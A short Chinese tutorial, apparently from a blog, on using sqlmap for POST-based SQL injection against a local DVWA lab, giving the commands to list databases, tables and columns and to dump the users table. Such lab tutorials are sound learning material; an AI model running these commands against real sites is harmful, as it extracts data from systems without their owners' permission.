参考链接:https://blog.csdn.net/qq_38412357/article/details/79559039
sqlmap入门(post)
不知道什么原因,这个平台测试不了,卡在一半,于是在本地的DVWA测试成功了,下面就以DVWA为例子(low级别的sql injection)
这是个典型的post注入,这里抓包一下
然后把抓到的内容全部复制在txt文本中.(这里我保存在自己的D盘下的2.txt里)
然后打开sqlmap,输入如下命令1
sqlmap.py -r "D:\2.txt" -p id --dbs
可以看到sqlmap获得了数据库的名字,-r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(id是注入点) –dbs意思是爆数据库名称
接下来是爆表(这里尝试爆数据库dvwa下的表)1
sqlmap.py -r "D:\2.txt" -p id -D dvwa --tables
可以看到爆出了表
然后爆字段(这里爆user表下的字段)1
sqlmap.py -r "D:\2.txt" -p id -D dvwa -T users --columns
爆出了当前users表下的字段
最后爆字段内容(这里任取字段user)1
sqlmap.py -r "D:\2.txt" -p id -D dvwa -T users -C user --dump
成功爆出字段内容
sqlmap入门(get)
https://blog.csdn.net/zgyulongfei/article/details/41017493
这个要更简单点